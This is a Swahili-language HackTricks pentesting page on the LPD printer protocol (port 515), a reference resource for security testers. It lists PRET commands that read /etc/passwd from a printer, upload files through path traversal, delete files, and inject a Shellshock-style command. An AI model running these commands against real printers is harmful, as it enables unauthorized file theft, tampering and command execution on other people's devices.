4.1 KiB
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.
Utangulizi kwa Itifaki ya LPD
Katika miaka ya 1980, Itifaki ya Line Printer Daemon (LPD) ilianzishwa katika Berkeley Unix, ambayo baadaye ilifanywa rasmi kupitia RFC1179. Itifaki hii inafanya kazi kupitia bandari 515/tcp, kuruhusu mwingiliano kupitia amri ya lpr. Kiini cha uchapishaji kupitia LPD ni kutuma faili ya kudhibiti (kutaja maelezo ya kazi na mtumiaji) pamoja na faili ya data (ambayo inashikilia habari za uchapishaji). Wakati faili ya kudhibiti inaruhusu uchaguzi wa muundo tofauti wa faili kwa faili ya data, kushughulikia faili hizi kunategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama ya Unix ni LPRng. Kwa umuhimu, itifaki ya LPD inaweza kutumiwa kudukua na kutekeleza kazi za uchapishaji za PostScript au PJL zenye nia mbaya.
Vyombo vya Mwingiliano na Printa za LPD
PRET inaleta zana mbili muhimu, lpdprint na lpdtest, zinazotoa njia rahisi ya kuingiliana na printa zinazofaa LPD. Zana hizi zinaruhusu vitendo mbalimbali kuanzia uchapishaji wa data hadi kubadilisha faili kwenye printa, kama kupakua, kupakia, au kufuta:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Kwa watu binafsi wanaopenda kuchunguza zaidi ulimwengu wa uchomaji wa printa, rasilimali kamili inaweza kupatikana hapa: Kuchoma Printa.
Shodan
bandari 515
Jifunze kuhusu uchomaji wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inayotangazwa katika HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi wa PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za uchomaji kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.